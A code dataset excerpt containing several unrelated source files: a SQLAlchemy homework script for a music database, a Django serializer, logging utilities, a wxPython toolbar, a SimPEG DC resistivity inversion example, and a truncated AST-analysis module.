['Six',2018],\n ['Seven',1998],\n ['Eigth',2012]]\n for album in albums:\n value = f\"\"\"insert into {table}({column1},{column2}) values('{album[0]}',{album[1]});\"\"\"\n connection.execute(value)\n\ndef add_styles_DB(connection):\n table = 'styles'\n column = 'name'\n styles = ['One',\n 'Two',\n 'Three',\n 'Four',\n 'Five',\n 'Six',\n 'Seven',\n 'Eigth']\n for style in styles:\n value = f\"\"\"insert into {table}({column}) values('{style}');\"\"\"\n connection.execute(value)\n\ndef add_collections_DB(connection):\n table = 'collection'\n column1 = 'name'\n column2 = 'year'\n collections = [['Сборник один',2020],\n ['Сборник два',2021],\n ['Сборник три',2019],\n ['Сборник четыре',2017],\n ['Сборник пять',2016],\n ['Сборник шесть',1976],\n ['Сборник семь',2018],\n ['Сборник восемь',2012]]\n for collection in collections:\n value = f\"\"\"insert into {table}({column1},{column2}) values('{collection[0]}',{collection[1]});\"\"\"\n connection.execute(value)\n\ndef add_songs_DB(connection):\n table = 'song'\n column1 = 'name'\n column2 = 'length'\n column3 = 'idalbum'\n songs = [['Трек 1',125,2],\n ['Трек 2',102,5],\n ['Трек 3',402,5],\n ['Трек 4',356,5],\n ['Трек my',296,2],\n ['Трек 6',159,1],\n ['Трек 7',180,1],\n ['Трек 8',195,3],\n ['Трек 9',235,4],\n ['Трек 10',160,6],\n ['Трек 11',162,7],\n ['Трек мой',188,8],\n ['Трек 13',210,3],\n ['Мой трек',295,8],\n ['Трек 13',212,6],\n ['Трек 14',265,5],\n ['Трек 15',333,3]]\n for song in songs:\n value = f\"\"\"insert into {table}({column1},{column2},{column3}) 
values('{song[0]}',{song[1]},{song[2]});\"\"\"\n connection.execute(value)\n\ndef add_albumexec_DB(connection):\n table = 'albumsexec'\n column1 = 'idalbum'\n column2 = 'idexec'\n albumexecs = [[1,2],\n [2,5],\n [3,2],\n [6,1],\n [8,1],\n [8,3],\n [7,4],\n [6,5],\n [3,7],\n [2,3],\n [1,3],\n [2,8],\n [4,6],\n [5,3],\n [4,3]]\n for albumexec in albumexecs:\n value = f\"\"\"insert into {table}({column1},{column2}) values({albumexec[0]},{albumexec[1]});\"\"\"\n connection.execute(value)\n\ndef add_collectionsong_DB(connection):\n table = 'collectionsong'\n column1 = 'idcollection'\n column2 = 'idsong'\n collectionsongs = [[1,1],\n [2,2],\n [3,3],\n [4,4],\n [5,5],\n [6,6],\n [7,7],\n [8,8],\n [1,9],\n [2,10],\n [3,11],\n [4,12],\n [5,13],\n [6,14],\n [7,15]]\n for collectionsong in collectionsongs:\n value = f\"\"\"insert into {table}({column1},{column2}) values({collectionsong[0]},{collectionsong[1]});\"\"\"\n connection.execute(value)\n\n\ndef add_stylesexec_DB(connection):\n table = 'stylesexec'\n column1 = 'idstyle'\n column2 = 'idexec'\n stylesexecs = [[1,1],\n [2,2],\n [3,3],\n [4,4],\n [5,5],\n [1,6],\n [2,7],\n [3,8],\n [4,7],\n [5,6],\n [1,5],\n [2,4],\n [3,5],\n [4,2],\n [5,1]]\n for stylesexec in stylesexecs:\n value = f\"\"\"insert into {table}({column1},{column2}) values({stylesexec[0]},{stylesexec[1]});\"\"\"\n connection.execute(value)\n\n\n\ndef select_albums_2018_DB(connection):\n table = 'albums'\n column1 = 'name'\n column2 = 'year'\n value = f\"\"\"select {column1},{column2} from {table} where {column2}=2018;\"\"\"\n data = connection.execute(value).fetchall()\n print('\nname and release year of albums released in 2018')\n print(data)\n\ndef select_long_song_DB(connection):\n table = 'song'\n column1 = 'name'\n column2 = 'length'\n value = f\"\"\"select {column1},{column2} from {table} ORDER BY {column2} DESC LIMIT 1;\"\"\"\n data = connection.execute(value).fetchall()\n print('\nname and duration of the longest track')\n print(data)\n\ndef select_song_3_5_DB(connection):\n table = 'song'\n column1 = 'name'\n column2 = 'length'\n min_length = int(3.5*60)\n value = f\"\"\"select {column1} from {table} where {column2} >= {min_length};\"\"\"\n data = connection.execute(value).fetchall()\n print('\nnames of tracks at least 3.5 minutes long')\n print(data)\n\ndef select_collections_2018_2020_DB(connection):\n table = 'collection'\n column1 = 'name'\n column2 = 'year'\n value = f\"\"\"select {column1},{column2} from {table} where {column2} BETWEEN 2018 AND 2020;\"\"\"\n data = connection.execute(value).fetchall()\n print('\nnames of collections released between 2018 and 2020 inclusive')\n print(data)\n\ndef select_exec_1_slovo_DB(connection):\n table = 'execut'\n column = 'name'\n value = f\"\"\"select {column} from {table} where {column} not like '%% %%';\"\"\"\n data = connection.execute(value).fetchall()\n print('\nartists whose name consists of a single word')\n print(data)\n\ndef select_song_my_DB(connection):\n table = 'song'\n column = 'name'\n value = f\"\"\"select {column} from {table} where lower ({column}) like lower ('%%my%%') OR lower ({column}) like lower ('%%мой%%');\"\"\"\n data = connection.execute(value).fetchall()\n print('\nnames of tracks that contain the word \"мой\"/\"my\"')\n print(data)\n\n\n\ndef create_tables(connection):\n '''Table creation block'''\n create_DB(connection) # create the tables\n create_link(connection) # create the link tables\n\ndef add_data_in_tables(connection):\n '''Data insertion block\n SQL 1\n Populate the database from the previous homework assignment. It must contain:\n\n at least 8 artists;\n at least 5 genres;\n at least 8 albums;\n at least 15 tracks;\n at least 8 collections.\n Note! Every field of every table must be filled in,\n including the link tables\n (artists with genres, artists with albums, collections with tracks).\n '''\n add_execut_DB(connection)\n add_albums_DB(connection)\n add_styles_DB(connection)\n add_collections_DB(connection)\n add_songs_DB(connection)\n add_albumexec_DB(connection)\n add_collectionsong_DB(connection)\n add_stylesexec_DB(connection)\n\ndef select_tables(connection):\n '''SELECT query block\n SQL 2\n Write SELECT queries that output the information according to the instructions below.\n Note! The query results must not be empty (keep this in mind when filling the tables).\n\n name and release year of albums released in 2018;\n name and duration of the longest track;\n names of tracks at least 3.5 minutes long;\n names of collections released between 2018 and 2020 inclusive;\n artists whose name consists of a single word;\n names of tracks that contain the word \"мой\"/\"my\".\n The deliverable is 3 files (with the INSERT, SELECT and CREATE queries from the previous assignment)\n in .sql format (or .py/.ipynb if you write the queries with SQLAlchemy).\n '''\n select_albums_2018_DB(connection)\n select_long_song_DB(connection)\n select_song_3_5_DB(connection)\n select_collections_2018_2020_DB(connection)\n select_exec_1_slovo_DB(connection)\n select_song_my_DB(connection)\n\nengine = sqlalchemy.create_engine('postgresql://postgres:pass@localhost:5432/postgres')\nconnection = engine.connect()\nnum = ''\nwhile num != '4':\n num = input('Enter one of the numbers below: \n1. to create the DB\n2. to insert data into the tables\n3. to run the SELECT queries\n4. to exit the program\n')\n if num == '1':\n create_tables(connection)\n print('Tables created')\n elif num == '2':\n try:\n add_data_in_tables(connection)\n except Exception:\n print('The data may have already been inserted')\n print('Data inserted into the tables')\n elif num == '3':\n select_tables(connection)\n print('\nSELECT queries executed')\n elif num == '4':\n print('THE PROGRAM HAS FINISHED')\n else:\n print('You entered an invalid character. Enter one of the numbers below: \n1. to create the DB\n2. to insert data into the tables\n3. to run the SELECT queries')\n","repo_name":"pavzzz2909/Homeworks-Netology","sub_path":"3 Базы данных для Python разработчиков/3 Select-запросы, выборки из одной таблицы/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12965,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39826635427","text":"from rest_framework import serializers\nfrom ..models.location import Location\nfrom .address_serializer import AddressSerializer\n\n\nclass LocationSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer for Location model.\n \"\"\"\n address = AddressSerializer()\n\n class Meta:\n model = Location\n fields = '__all__'\n read_only_fields = ['id']\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new Location instance.\n \"\"\"\n address_data = validated_data.pop('address')\n address_serializer = AddressSerializer(data=address_data)\n address_serializer.is_valid(raise_exception=True)\n address = address_serializer.save()\n return Location.objects.create(address=address, **validated_data)\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing Location instance.\n \"\"\"\n address_data = validated_data.pop('address', None)\n if address_data:\n address_serializer = AddressSerializer(instance.address, data=address_data)\n address_serializer.is_valid(raise_exception=True)\n address = address_serializer.save()\n validated_data['address'] = address\n instance.location_name = validated_data.get('location_name', instance.location_name)\n instance.description = validated_data.get('description', instance.description)\n instance.photo = validated_data.get('photo', instance.photo)\n instance.save()\n return instance\n","repo_name":"azaz0/search-trip","sub_path":"trip_management/serializers/location_serializer.py","file_name":"location_serializer.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1087046964","text":"import time\nfrom contextlib import contextmanager\n\nimport numpy as np\n\nfrom imitation.helpers.misc_util import zipsame, prettify_time, var_shape, numel\n\n\ndef cell(x, width):\n \"\"\"Format a tabular cell to the specified width\"\"\"\n if isinstance(x, np.ndarray):\n assert x.ndim == 0\n x = x.item()\n rep = \"{:G}\".format(x) if isinstance(x, float) else str(x)\n return rep + (' ' * (width - len(rep)))\n\n\ndef columnize(names, tuples, widths, indent=2):\n \"\"\"Generate and return the content of table\n (w/o logging or printing anything)\n\n Args:\n width (int): Width of each cell in the table\n indent (int): Indentation spacing prepended to every row in the table\n \"\"\"\n indent_space = indent * ' '\n # Add row containing the names\n table = indent_space + \" | \".join(cell(name, width) for name, width in zipsame(names, widths))\n table_width = len(table)\n # Add header hline\n table += '\\n' + indent_space + ('-' * table_width)\n for tuple_ in tuples:\n # Add a new row\n table += '\\n' + indent_space\n table += \" | \".join(cell(value, width) for value, width in zipsame(tuple_, widths))\n # Add closing hline\n table += '\\n' + indent_space + ('-' * table_width)\n return table\n\n\ndef colorize(string, color, bold=False, highlight=False):\n color2num = {'gray': 30, 'red': 31, 'green': 32, 'yellow': 33, 'blue': 34,\n 'magenta': 35, 'cyan': 36, 'white': 37, 'crimson': 38}\n attr = []\n num = color2num[color]\n if highlight:\n num += 10\n attr.append(str(num))\n if bold:\n attr.append('1')\n return '\\x1b[%sm%s\\x1b[0m' % (';'.join(attr), string)\n\n\ndef log_module_info(logger, name, *components):\n assert len(components) > 0, \"components list is empty\"\n for component in components:\n logger.info(\"logging {}/{} specs\".format(name, component.name))\n names = [var.name for var in component.trainable_vars]\n shapes = [var_shape(var) for var in component.trainable_vars]\n num_paramss = [numel(var) for var in component.trainable_vars]\n zipped_info = zipsame(names, shapes, num_paramss)\n logger.info(columnize(names=['name', 'shape', 'num_params'],\n tuples=zipped_info,\n widths=[40, 16, 10]))\n logger.info(\" total num params: {}\".format(sum(num_paramss)))\n\n\ndef timed_cm_wrapper(comm=None, logger=None, color_message='magenta', color_elapsed_time='cyan'):\n \"\"\"Wraps a context manager that records the time taken by encapsulated ops\"\"\"\n @contextmanager\n def _timed(message):\n \"\"\"Display the time it took for the mpi master\n to perform the task within the context manager\n \"\"\"\n if comm is None or comm.Get_rank() == 0:\n logger.info(colorize(message, color=color_message))\n tstart = time.time()\n yield\n logger.info(colorize(\" [done in {:.3f} seconds]\".format(time.time() - tstart),\n color=color_elapsed_time))\n else:\n yield\n return _timed\n\n\ndef pretty_iter(logger, i):\n \"\"\"Display the current iteration with a colored decorator\"\"\"\n logger.info(colorize(\"I T E R A T I O N {}\".format(i), color='blue'))\n\n\ndef pretty_elapsed(logger, tstart):\n \"\"\"Display the elapsed time with a colored decorator\"\"\"\n elapsed = prettify_time(time.time() - tstart)\n # logger.info('')\n logger.info(colorize(\"E L A P S E D {}\".format(elapsed), color='green'))\n","repo_name":"lionelblonde/sam-tf","sub_path":"imitation/helpers/console_util.py","file_name":"console_util.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"}
+{"seq_id":"4905289454","text":"__author__ = 'Joao'\nfrom SolTw import _Utils as _Utils\n\n\nclass Hashtags:\n def __init__(self, dictionary=dict()):\n dictionary= _Utils.CastToDictionary(dictionary)\n dictionary= _Utils.removeEmptyFields(dictionary)\n self.indices=\"\"\n self.text=\"\"\n if (\"indices\" in dictionary):\n self.indices=dictionary[\"indices\"]\n if (\"text\" in dictionary):\n self.text=dictionary[\"text\"]\n\n\n def __str__(self):\n dic=self.__dict__\n lista=list()\n for key in dic:\n lista.append(key)\n for key in lista:\n if dic[key]==None or dic[key]==\"\":\n del dic[key]\n return \"HASHTAGS: \"+str(dic)\n\n def __repr__(self):\n dic=self.__dict__\n lista=list()\n for key in dic:\n lista.append(key)\n for key in lista:\n if dic[key]==None or dic[key]==\"\":\n del dic[key]\n return \"HASHTAGS: \"+str(dic)","repo_name":"JoaoMachadoJr/SOL","sub_path":"Projeto/SolTw/_Hashtags.py","file_name":"_Hashtags.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35415368981","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 27/05/2014\n\n@author: aferreira\n'''\n\nimport wx\nfrom py.una.pol.tava.presenter.ptoolbar import ToolBarPresenter\nfrom wx import GetTranslation as _\nimport py.una.pol.tava.view.vi18n as C\nimport py.una.pol.tava.view.vimages as I\n\n\nclass MainToolBar(wx.ToolBar):\n '''\n Clase que representa al ToolBar Principal desplegando algunas opciones\n de trabajo que pueden utilizarse dentro del área de trabajo.\n '''\n\n def __init__(self, parent):\n '''\n Constructor para la clase MainToolBar\n :param parent: referencia a la clase padre de MainToolBar.\n '''\n super(MainToolBar, self).__init__(parent, wx.TB_HORIZONTAL)\n\n # Creacion del Presenter\n self.presenter = ToolBarPresenter(self)\n\n # Creacion de los ids de los diferentes tools\n self.SetIdReferences()\n\n self.SetToolBitmapSize((16, 16))\n\n # Nuevo Proyecto\n new_bmp = wx.ArtProvider.GetBitmap(wx.ART_NEW)\n self.AddLabelTool(self.ID_NEW_PRO, '', new_bmp)\n self.EnableTool(self.ID_NEW_PRO, True)\n self.Bind(wx.EVT_TOOL, self.OnProjectNew, id=self.ID_NEW_PRO)\n\n # Abrir Proyecto\n open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN)\n self.AddLabelTool(self.ID_OPEN_PRO, '', open_bmp)\n self.EnableTool(self.ID_OPEN_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectOpen, id=self.ID_OPEN_PRO)\n\n # Cerrar Proyecto\n self.AddLabelTool(self.ID_CLOSE_PRO, '', I.close_png)\n self.EnableTool(self.ID_CLOSE_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectClose, id=self.ID_CLOSE_PRO)\n\n # Eliminar Proyecto\n self.AddLabelTool(self.ID_DEL_PRO, '', I.delete_png)\n self.EnableTool(self.ID_DEL_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectDelete, id=self.ID_DEL_PRO)\n\n # Blog de Proyecto\n self.AddLabelTool(self.ID_BLOG_PRO, '', I.blog_png)\n self.EnableTool(self.ID_BLOG_PRO, False)\n\n self.AddSeparator()\n\n # Desocultar Proyecto\n self.AddLabelTool(self.ID_UNHIDE_PRO, '', I.hide_left_png)\n self.EnableTool(self.ID_UNHIDE_PRO, True)\n self.Bind(wx.EVT_TOOL, self.OnProjectUnHide, id=self.ID_UNHIDE_PRO)\n\n # Ocultar Proyecto\n self.AddLabelTool(self.ID_HIDE_PRO, '', I.hide_right_png)\n self.EnableTool(self.ID_HIDE_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectHide, id=self.ID_HIDE_PRO)\n\n self.AddSeparator()\n\n # Salir Aplicacion\n exit_bmp = wx.ArtProvider.GetBitmap(wx.ART_QUIT)\n self.AddLabelTool(self.ID_EXIT_PRO, '', exit_bmp)\n self.Bind(wx.EVT_TOOL, parent.OnApplicationExit, id=self.ID_EXIT_PRO)\n\n # Establecemos los labels\n self.SetLabels()\n\n # Finalizando la creacion del toolbar\n self.Realize()\n\n def SetIdReferences(self):\n self.ID_NEW_PRO = wx.NewId()\n self.ID_OPEN_PRO = wx.NewId()\n self.ID_CLOSE_PRO = wx.NewId()\n self.ID_DEL_PRO = wx.NewId()\n self.ID_BLOG_PRO = wx.NewId()\n self.ID_EXIT_PRO = wx.NewId()\n self.ID_HIDE_PRO = wx.NewId()\n self.ID_UNHIDE_PRO = wx.NewId()\n\n def EnableDisableOpenProject(self):\n self.EnableTool(self.ID_DEL_PRO, True)\n self.EnableTool(self.ID_CLOSE_PRO, True)\n self.EnableTool(self.ID_BLOG_PRO, True)\n self.EnableTool(self.ID_OPEN_PRO, False)\n self.EnableTool(self.ID_HIDE_PRO, False)\n\n def EnableDisableCloseProject(self):\n self.EnableTool(self.ID_DEL_PRO, True)\n self.EnableTool(self.ID_OPEN_PRO, True)\n self.EnableTool(self.ID_CLOSE_PRO, False)\n self.EnableTool(self.ID_BLOG_PRO, False)\n self.EnableTool(self.ID_HIDE_PRO, True)\n\n def DisableAllProject(self):\n self.EnableTool(self.ID_DEL_PRO, False)\n self.EnableTool(self.ID_CLOSE_PRO, False)\n self.EnableTool(self.ID_BLOG_PRO, False)\n 
self.EnableTool(self.ID_OPEN_PRO, False)\n self.EnableTool(self.ID_HIDE_PRO, False)\n\n def OnProjectClose(self, event):\n self.presenter.CloseProject()\n\n def OnProjectOpen(self, event):\n self.presenter.OpenProject()\n\n def OnProjectDelete(self, event):\n self.presenter.DeleteProject()\n\n def OnProjectNew(self, event):\n self.presenter.NewProject()\n\n def OnProjectHide(self, event):\n self.presenter.HideProject()\n\n def OnProjectUnHide(self, event):\n self.presenter.UnHideProject()\n\n def SetLabels(self):\n self.SetToolShortHelp(self.ID_NEW_PRO, _(C.MTB_NP))\n self.SetToolShortHelp(self.ID_OPEN_PRO, _(C.MTB_OP))\n self.SetToolShortHelp(self.ID_CLOSE_PRO, _(C.MTB_CP))\n self.SetToolShortHelp(self.ID_DEL_PRO, _(C.MTB_DP))\n self.SetToolShortHelp(self.ID_BLOG_PRO, _(C.MTB_BP))\n self.SetToolShortHelp(self.ID_EXIT_PRO, _(C.MTB_EX))\n self.SetToolShortHelp(self.ID_HIDE_PRO, _(C.MTB_HP))\n self.SetToolShortHelp(self.ID_UNHIDE_PRO, _(C.MTB_UHP))\n","repo_name":"abrahanfretes/tava_antes","sub_path":"py/una/pol/tava/view/vtoolbar.py","file_name":"vtoolbar.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33213138704","text":"\"\"\"\n2.5D DC inversion of with Topography\n====================================\n\nThis is an example for 2.5D DC inversion. Earth includes a topography,\nand below the topography conductive and resistive cylinders are embedded.\nSensitivity weighting is used for the inversion.\nApproximate depth of investigation is computed by selecting\n1 percent of max(sqrt(diag(JtJ))), and regions having smaller sensitivity\nthan this is blanked.\nUser is promoted to try different suvey_type such as 'pole-dipole',\n'dipole-pole', and 'pole-pole'.\n\"\"\"\n\nfrom SimPEG.electromagnetics.static import resistivity as DC\nfrom SimPEG.electromagnetics.static.utils import generate_dcip_survey, genTopography\nfrom SimPEG import (\n maps,\n utils,\n data_misfit,\n regularization,\n optimization,\n inversion,\n inverse_problem,\n directives,\n)\nfrom discretize.utils import active_from_xyz\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nfrom pylab import hist\n\ntry:\n from pymatsolver import Pardiso as Solver\nexcept ImportError:\n from SimPEG import SolverLU as Solver\n\n\ndef run(plotIt=True, survey_type=\"dipole-dipole\"):\n np.random.seed(1)\n # Initiate I/O class for DC\n IO = DC.IO()\n # Obtain ABMN locations\n\n xmin, xmax = 0.0, 200.0\n ymin, ymax = 0.0, 0.0\n zmin, zmax = 0, 0\n endl = np.array([[xmin, ymin, zmin], [xmax, ymax, zmax]])\n # Generate DC survey object\n survey = generate_dcip_survey(\n endl, survey_type=survey_type, dim=2, a=10, b=10, n=10\n )\n survey = IO.from_abmn_locations_to_survey(\n survey.locations_a,\n survey.locations_b,\n survey.locations_m,\n survey.locations_n,\n survey_type,\n data_dc_type=\"volt\",\n )\n\n # Obtain 2D TensorMesh\n mesh, actind = IO.set_mesh()\n topo, mesh1D = genTopography(mesh, -10, 0, its=100)\n actind = active_from_xyz(mesh, np.c_[mesh1D.cell_centers_x, topo])\n survey.drape_electrodes_on_topography(mesh, actind, option=\"top\")\n\n # Build a conductivity model\n blk_inds_c = utils.model_builder.getIndicesSphere(\n np.r_[60.0, -25.0], 12.5, mesh.gridCC\n )\n blk_inds_r = utils.model_builder.getIndicesSphere(\n np.r_[140.0, -25.0], 12.5, mesh.gridCC\n )\n sigma = np.ones(mesh.nC) * 1.0 / 100.0\n sigma[blk_inds_c] = 1.0 / 10.0\n sigma[blk_inds_r] = 1.0 / 1000.0\n sigma[~actind] = 1.0 / 1e8\n rho = 1.0 / sigma\n\n # Show the true conductivity model\n if plotIt:\n fig = plt.figure(figsize=(12, 3))\n ax = plt.subplot(111)\n temp = rho.copy()\n temp[~actind] = np.nan\n out = mesh.plot_image(\n temp,\n grid=True,\n ax=ax,\n grid_opts={\"alpha\": 0.2},\n clim=(10, 1000),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n )\n ax.plot(\n survey.electrode_locations[:, 0], survey.electrode_locations[:, 1], \"k.\"\n )\n ax.set_xlim(IO.grids[:, 0].min(), IO.grids[:, 0].max())\n ax.set_ylim(-IO.grids[:, 1].max(), IO.grids[:, 1].min())\n cb = plt.colorbar(out[0])\n cb.set_label(\"Resistivity (ohm-m)\")\n ax.set_aspect(\"equal\")\n plt.show()\n\n # Use Exponential Map: m = log(rho)\n actmap = maps.InjectActiveCells(mesh, indActive=actind, valInactive=np.log(1e8))\n mapping = maps.ExpMap(mesh) * actmap\n\n # Generate mtrue\n mtrue = np.log(rho[actind])\n\n # Generate 2.5D DC problem\n # \"N\" means potential is defined at nodes\n prb = DC.Simulation2DNodal(\n mesh, survey=survey, rhoMap=mapping, storeJ=True, Solver=Solver, verbose=True\n )\n\n # Make synthetic DC data with 5% Gaussian noise\n data = prb.make_synthetic_data(mtrue, relative_error=0.05, add_noise=True)\n\n IO.data_dc 
= data.dobs\n # Show apparent resisitivty pseudo-section\n if plotIt:\n IO.plotPseudoSection(data=data.dobs, data_type=\"apparent_resistivity\")\n\n # Show apparent resisitivty histogram\n if plotIt:\n fig = plt.figure()\n out = hist(data.dobs, bins=20)\n plt.xlabel(r\"Apparent Resisitivty ($\\Omega$m)\")\n plt.show()\n\n # Set initial model based upon histogram\n m0 = np.ones(actmap.nP) * np.log(100.0)\n\n # Set standard_deviation\n # floor (10 ohm-m)\n eps = 1.0\n # percentage\n relative = 0.05\n dmisfit = data_misfit.L2DataMisfit(simulation=prb, data=data)\n uncert = abs(data.dobs) * relative + eps\n dmisfit.standard_deviation = uncert\n\n # Map for a regularization\n regmap = maps.IdentityMap(nP=int(actind.sum()))\n\n # Related to inversion\n reg = regularization.Sparse(mesh, indActive=actind, mapping=regmap)\n opt = optimization.InexactGaussNewton(maxIter=15)\n invProb = inverse_problem.BaseInvProblem(dmisfit, reg, opt)\n beta = directives.BetaSchedule(coolingFactor=5, coolingRate=2)\n betaest = directives.BetaEstimate_ByEig(beta0_ratio=1e0)\n target = directives.TargetMisfit()\n updateSensW = directives.UpdateSensitivityWeights()\n update_Jacobi = directives.UpdatePreconditioner()\n inv = inversion.BaseInversion(\n invProb, directiveList=[beta, target, updateSensW, betaest, update_Jacobi]\n )\n prb.counter = opt.counter = utils.Counter()\n opt.LSshorten = 0.5\n opt.remember(\"xc\")\n\n # Run inversion\n mopt = inv.run(m0)\n\n # Get diag(JtJ)\n mask_inds = np.ones(mesh.nC, dtype=bool)\n jtj = np.sqrt(updateSensW.JtJdiag[0])\n jtj /= jtj.max()\n temp = np.ones_like(jtj, dtype=bool)\n temp[jtj > 0.005] = False\n mask_inds[actind] = temp\n actind_final = np.logical_and(actind, ~mask_inds)\n jtj_cc = np.ones(mesh.nC) * np.nan\n jtj_cc[actind] = jtj\n\n # Show the sensitivity\n if plotIt:\n fig = plt.figure(figsize=(12, 3))\n ax = plt.subplot(111)\n temp = rho.copy()\n temp[~actind] = np.nan\n out = mesh.plot_image(\n jtj_cc,\n grid=True,\n ax=ax,\n grid_opts={\"alpha\": 0.2},\n clim=(0.005, 0.5),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n )\n ax.plot(\n survey.electrode_locations[:, 0], survey.electrode_locations[:, 1], \"k.\"\n )\n ax.set_xlim(IO.grids[:, 0].min(), IO.grids[:, 0].max())\n ax.set_ylim(-IO.grids[:, 1].max(), IO.grids[:, 1].min())\n cb = plt.colorbar(out[0])\n cb.set_label(\"Sensitivity\")\n ax.set_aspect(\"equal\")\n plt.show()\n\n # Convert obtained inversion model to resistivity\n # rho = M(m), where M(.) 
is a mapping\n\n rho_est = mapping * mopt\n rho_est[~actind_final] = np.nan\n rho_true = rho.copy()\n rho_true[~actind_final] = np.nan\n\n # show recovered conductivity\n if plotIt:\n fig, ax = plt.subplots(2, 1, figsize=(20, 6))\n out1 = mesh.plot_image(\n rho_true,\n clim=(10, 1000),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n ax=ax[0],\n )\n out2 = mesh.plot_image(\n rho_est,\n clim=(10, 1000),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n ax=ax[1],\n )\n out = [out1, out2]\n for i in range(2):\n ax[i].plot(\n survey.electrode_locations[:, 0], survey.electrode_locations[:, 1], \"kv\"\n )\n ax[i].set_xlim(IO.grids[:, 0].min(), IO.grids[:, 0].max())\n ax[i].set_ylim(-IO.grids[:, 1].max(), IO.grids[:, 1].min())\n cb = plt.colorbar(out[i][0], ax=ax[i])\n cb.set_label(r\"Resistivity ($\\Omega$m)\")\n ax[i].set_xlabel(\"Northing (m)\")\n ax[i].set_ylabel(\"Elevation (m)\")\n ax[i].set_aspect(\"equal\")\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"simpeg/simpeg","sub_path":"examples/_archived/plot_inv_dcip_dipoledipole_2_5Dinversion.py","file_name":"plot_inv_dcip_dipoledipole_2_5Dinversion.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","stars":438,"dataset":"github-code","pt":"7"}
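One step in the script above worth isolating is the depth-of-investigation masking on sqrt(diag(JtJ)). A minimal standalone sketch of the same idea follows; the random array is a stand-in for the real sensitivity diagonal.

import numpy as np

jtj = np.sqrt(np.random.rand(100))   # stand-in for sqrt(diag(J.T @ J))
jtj /= jtj.max()                     # normalize to the peak sensitivity

# Blank cells whose relative sensitivity is at or below the script's
# 0.005 threshold; only the remaining cells appear in the final plots.
low_sensitivity = jtj <= 0.005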
+{"seq_id":"25072093028","text":"from ast import AST, Store\nfrom typing import Iterator, List, Optional\n\nfrom .WalkAST import NodeStack\nfrom ..primitives import Primitive\n\nclass Reference:\n\tdef __init__(self, node: AST, stack: NodeStack):\n\t\tself.node = node\n\t\tself.stack = stack.copy()\n\t\tself.is_store: bool = hasattr(node, 'ctx') and type(node.ctx) == Store\n\t\n\tdef __eq__(self, other):\n\t\tif isinstance(other, AST):\n\t\t\treturn self.node == other\n\t\treturn super().__eq__(other)\n\nclass ProgramData:\n\n\tclass Element:\n\n\t\tdef __init__(\n\t\t\tself,\n\t\t\ttype: str,\n\t\t\tscope: int,\n\t\t\tid: str,\n\t\t\tdeclaration: Optional[AST],\n\t\t\tstack: Optional[NodeStack],\n\t\t) -> None:\n\t\t\tself.type = type\n\t\t\tself.scope = scope\n\t\t\tself.id = id\n\t\t\tself.declaration: Optional[Reference] = None\n\t\t\tself.container_scope: Optional[int] = None\n\t\t\tself.references: List[Reference] = []\n\t\t\tself.values: List[Primitive] = []\n\t\t\tself.evaluations: List[int] = []\n\t\t\tif declaration:\n\t\t\t\tself.declaration = Reference(declaration, stack or [])\n\n\t\tdef set_container_scope(self, scope: int) -> None:\n\t\t\tself.container_scope = scope\n\n\t\tdef reference(self, node: AST, stack: NodeStack) -> None:\n\t\t\tself.references.append(Reference(node, stack))\n\n\t\tdef value(self, value: Primitive) -> None:\n\t\t\tself.values.append(value)\n\n\t\tdef evaluation(self, branch: int) -> None:\n\t\t\tself.evaluations.append(branch)\n\n\t\tdef has_reference(self, node: AST) -> bool:\n\t\t\treturn node == self.declaration or node in self.references\n\n\t\tdef __repr__(self) -> str:\n\t\t\tcscope = f' -> S{self.container_scope}' if self.container_scope else ''\n\t\t\tinfo = [f'{self.type}: (S{self.scope}{cscope}) {self.id}']\n\t\t\tif not self.declaration is None:\n\t\t\t\tinfo.append(f' declared on {self.declaration.node.lineno}')\n\t\t\tif len(self.references) > 0:\n\t\t\t\tinfo.append(f' referenced on {\", \".join(str(r.node.lineno) for r in self.references)}')\n\t\t\tif len(self.values) > 0:\n\t\t\t\tinfo.append(f' assigned values {\", \".join(str(v) for v in self.values)}')\n\t\t\tif len(self.evaluations) > 0:\n\t\t\t\tinfo.append(f' evaluated {len(self.evaluations)} times')\n\t\t\treturn '\\n'.join(info)\n\n\tdef __init__(self):\n\t\tself.elements: List[self.Element] = []\n\n\tdef declare(\n\t\tself,\n\t\ttype: str,\n\t\tscope: int,\n\t\tid: str,\n\t\tdeclaration: Optional[AST] = None,\n\t\tstack: Optional[NodeStack] = None\n\t) -> Element:\n\t\tel = self.Element(type, scope, id, declaration, stack)\n\t\tself.elements.append(el)\n\t\treturn el\n\n\tdef element_n(self, n: int) -> Element:\n\t\treturn self.elements[n]\n\n\tdef element_for_node(self, node: AST, types: List[str]) -> Element:\n\t\tfor i, el in enumerate(self.elements):\n\t\t\tif el.type in types and el.has_reference(node):\n\t\t\t\treturn i, el\n\t\treturn None, None\n\t\n\tdef elements_for_types(self, types: List[str]) -> 